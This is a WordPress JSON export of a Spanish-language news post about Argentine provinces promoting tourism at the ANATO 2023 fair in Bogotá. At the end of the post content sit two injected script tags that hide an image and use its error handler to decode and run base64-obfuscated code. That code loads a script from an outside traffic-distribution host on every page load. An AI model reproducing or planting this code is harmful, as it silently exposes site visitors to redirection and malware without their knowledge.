{"id":2268,"date":"2023-02-24T10:41:58","date_gmt":"2023-02-24T13:41:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2268"},"modified":"2025-08-14T00:22:37","modified_gmt":"2025-08-14T03:22:37","slug":"anato-2023-los-destinos-argentinos-conquistaron-al-trade-colombiano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2268","title":{"rendered":"<strong>ANATO 2023: LOS DESTINOS ARGENTINOS CONQUISTARON AL TRADE COLOMBIANO<\/strong>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Salta, El Calafate, Chubut, Santa Cruz y Tierra del Fuego brindaron diferentes exposiciones que sedujeron a los profesionales del turismo de Colombia, \u00e1vidos de promover las distintas regiones de nuestro pa\u00eds.<\/em><\/h4>\n\n\n\n<p><em>\u201cEs un destino so\u00f1ado\u201d. \u201cLuego del Mundial, la imagen de Argentina se ha visibilizado much\u00edsimo y nuestros clientes nos consultan muy seguido\u201d. \u201cEl Tango, la Patagonia, la nieve y, fundamentalmente, la m\u00edstica de Argentina\u201d<\/em>. Todas estas frases surgen de parte de los distintos operadores colombianos que se acercan al stand de Argentina cuando hablan de nuestro pa\u00eds.<\/p>\n\n\n\n<p>En pos de recibir a\u00fan m\u00e1s informaci\u00f3n detallada sobre los destinos del pa\u00eds, el trade colombiano se sum\u00f3 en gran n\u00famero a las presentaciones que hicieron algunos de los destinos argentinos que acompa\u00f1an al\u00a0<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR) en la feria ANATO 2023<\/strong>, en Bogot\u00e1, Colombia.<\/p>\n\n\n\n<p>Durante la segunda jornada de la principal feria tur\u00edstica colombiana,\u00a0<strong>Salta<\/strong>, destino ic\u00f3nico del Norte argentino con sus vinos, las empanadas y el famoso Tren a las Nubes, entre otras grandes propuestas, inici\u00f3 las exposiciones.\u00a0<em>\u201cSalta es una referencia tur\u00edstica del Norte del pa\u00eds. Venir a esta feria nos permite continuar posicion\u00e1ndonos y avanzar con m\u00e1s y mejores propuestas. Salta es una manera diferente de conocer Argentina\u201d<\/em>, destac\u00f3\u00a0<strong>Manuela Arancibia, Presidenta del INPROTUR Salta<\/strong>.<\/p>\n\n\n\n<p>Posteriormente, continu\u00f3\u00a0<strong>El Calafate<\/strong>, una de las estrellas tur\u00edsticas de Argentina. Esta ciudad patag\u00f3nica, al sudoeste de la Provincia de Santa Cruz, es la base ideal para conocer el mundialmente famoso glaciar Perito Moreno.\u00a0<em>\u201cPara nosotros venir a promover el destino de naturaleza de Patagonia en el norte de Sudam\u00e9rica y Centroam\u00e9rica es prioritario\u201d<\/em>, afirm\u00f3\u00a0<strong>Julio G\u00f3mez, Gerente del Ente Mixto de Promoci\u00f3n Tur\u00edstica de El Calafate<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci6.googleusercontent.com\/proxy\/EyeN3ZdOsY2gnVXBisbUHliv9cTR4xmo90LhZ-IdJhbHf0FTkk6Fk3Rt8BmKyDW99c4lS-1zXaRLp3QZ50B7Js16NHRWBhXt0ZD2rEAAcEpjDRttXu4Z1pMtaglWIHu_v8RJiMeRqABImZe6Aa_Crdel91soSA=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/c94f9fb3-b581-2260-87bc-d6c607753201.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Luego fue el turno de la<strong>\u00a0Provincia de Chubut<\/strong>, tambi\u00e9n en la Patagonia, y referente en cuanto al avistaje de ballenas. Aqu\u00ed se encuentra la Pen\u00ednsula Vald\u00e9s, uno de los lugares argentinos Patrimonio de la Humanidad.\u00a0<em>\u201cNunca hab\u00edamos estado en ANATO, por lo que nuestra presencia es muy importante. Ahora generamos una agencia de promoci\u00f3n mixta, con mayor\u00eda privada y estamos trabajando en la comercializaci\u00f3n del turismo comercializado que llega a los distintos destinos de nuestra provincia. Quiero destacar la tarea del INPROTUR, que es fant\u00e1stica en todas las ferias. Somos un equipo nacional\u201d<\/em>, valor\u00f3\u00a0<strong>Leonardo Gaffet, Ministro de Turismo y \u00c1reas Protegidas de Chubut<\/strong>.<\/p>\n\n\n\n<p>M\u00e1s tarde, la mencionada<strong>\u00a0Provincia de Santa Cruz<\/strong>\u00a0repas\u00f3 su ampl\u00edsima oferta repleta de naturaleza con los Parques Nacionales Patagonia, Perito Moreno, Los Glaciares y Monte Le\u00f3n, entre otros, y sitios impactantes como El Chalt\u00e9n, la Capital Nacional del Trekking.\u00a0<strong>Alejandro Agulla, Director de Desarrollo de la Secretar\u00eda de Estado de Turismo de Santa Cruz<\/strong>, sostuvo que\u00a0<em>\u201ces fundamental mantener el contacto fluido de informaci\u00f3n con el mercado local; para nosotros Colombia es un mercado muy importante, es el tercero de Latinoam\u00e9rica en nuestro destino, por lo tanto es prioritario\u00bb.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci4.googleusercontent.com\/proxy\/_joAZAbA-H88MhJSD0u0-DhRGyOGDjXuq30XT4mg2Yp3cK1IqONwQ3yqv0XBxExvVEQmRxZ04ArmgWx5cAGgrSJaQiQOL7T0E88pNO9jShkxeiVistEMhQJuJhalKqHAL7ieLq1Y7mrYNlIwrApYp0kdR99PBg=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/8f5247e0-f0cf-021a-cc08-9f2aad73431d.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por \u00faltimo, desde el punto m\u00e1s austral de Argentina, fue el turno de\u00a0<strong>Tierra del Fuego<\/strong>, provincia cuya capital es Ushuaia, la ciudad del Fin del Mundo. La gastronom\u00eda, de la mano de la centolla o la merluza negra, la magia de la nieve en el Cerro Castor o la pesca deportiva en R\u00edo Grande son s\u00f3lo algunas de las tantas m\u00e1ximas que se pueden vivir all\u00ed.\u00a0<em>\u201cHace casi 10 a\u00f1os que venimos a Colombia. Esperamos que los colombianos nos visiten, que se sumen a la oferta invernal con la nieve, a las actividades de verano y a la experiencia de visitar la Ant\u00e1rtida\u201d<\/em>, se\u00f1al\u00f3\u00a0<strong>Viviana Borrego, Jefa de Promoci\u00f3n y Eventos del Instituto Fueguino de Turismo (INFUETUR)<\/strong>.<br>\u00a0<br>Hoy, ser\u00e1 el turno de\u00a0<strong>Visit Buenos Aires<\/strong>, organismo que informar\u00e1 en detalle los cl\u00e1sicos y lo nuevo que siempre tiene la fascinante capital argentina.<br>\u00a0<br>A tener en cuenta: los vuelos de Bogot\u00e1 a Buenos a trav\u00e9s de Aerol\u00edneas Argentinas llegan al Aeroparque de la Ciudad de Buenos Aires y desde esta terminal a\u00e9rea, el viajero y la viajera colombiana puede conectar con vuelos a las 23 provincias de Argentina.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci6.googleusercontent.com\/proxy\/_HO1QHdUZSCp27bsV06x-TUTRuGIT37us8dvo4LcrwV-EAx6ud7buXouH5i2UVThcRe_3iahush-mCMdvJSNuoA1FaFdXGlBymqlyO-9b_SkVra-lXFkZkRwMAB3VBgBzoOTO11WThuOxdK0NmUiemeZ9A5K6w=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/516144b8-34b0-52d8-4f6f-314406d166e9.png\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta, El Calafate, Chubut, Santa Cruz y Tierra del Fuego brindaron diferentes exposiciones que sedujeron a los profesionales del turismo de Colombia, \u00e1vidos de promover las distintas regiones de nuestro pa\u00eds. \u201cEs un destino so\u00f1ado\u201d. \u201cLuego del Mundial, la imagen de Argentina se ha visibilizado much\u00edsimo y nuestros clientes nos consultan muy seguido\u201d. \u201cEl Tango, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2269,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2268","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2268"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2268"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2268\/revisions"}],"predecessor-version":[{"id":7166,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2268\/revisions\/7166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2269"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}